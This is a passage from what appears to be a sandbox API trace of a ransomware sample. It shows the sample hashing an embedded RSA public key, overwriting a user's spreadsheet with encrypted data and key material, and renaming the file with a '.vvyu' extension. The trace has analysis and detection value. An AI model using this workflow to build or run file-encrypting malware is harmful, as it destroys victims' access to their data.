KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.389] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.389] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.389] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.390] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.390] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.390] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.390] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.390] GetLastError () returned 0x0 [0189.390] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.390] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.391] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.391] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.391] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc420) returned 0x2af5168 [0189.391] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2c80 [0189.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daf0 [0189.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2cc8 [0189.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db08 [0189.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db38 [0189.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db98 [0189.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db50 [0189.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.392] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db98 [0189.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0189.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db50 [0189.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0db38 [0189.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0189.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0189.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.394] GetCurrentThreadId () returned 0x5d8 [0189.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae44e8 [0189.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.395] GetCurrentThreadId () returned 0x5d8 [0189.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0189.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0189.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db98 [0189.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db38 [0189.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0189.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db50 [0189.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db20 [0189.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbb0 [0189.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0189.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db80 [0189.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db68 [0189.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbc8 [0189.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db68 [0189.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0189.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db38 [0189.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0189.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2cc8 | out: hHeap=0x2c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.405] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xc417, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xc417, lpOverlapped=0x0) returned 1 [0189.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.406] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc41c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.406] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.408] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.408] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.408] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.409] CloseHandle (hObject=0x584) returned 1 [0189.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0189.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0189.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0189.411] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\RN1rbBo1eqYMG_Q.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\rn1rbbo1eqymg_q.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\RN1rbBo1eqYMG_Q.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\rn1rbbo1eqymg_q.xlsx.vvyu")) returned 1 [0189.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.413] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0189.416] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10399150, ftCreationTime.dwHighDateTime=0x1d85163, ftLastAccessTime.dwLowDateTime=0x8cca3200, ftLastAccessTime.dwHighDateTime=0x1d89142, 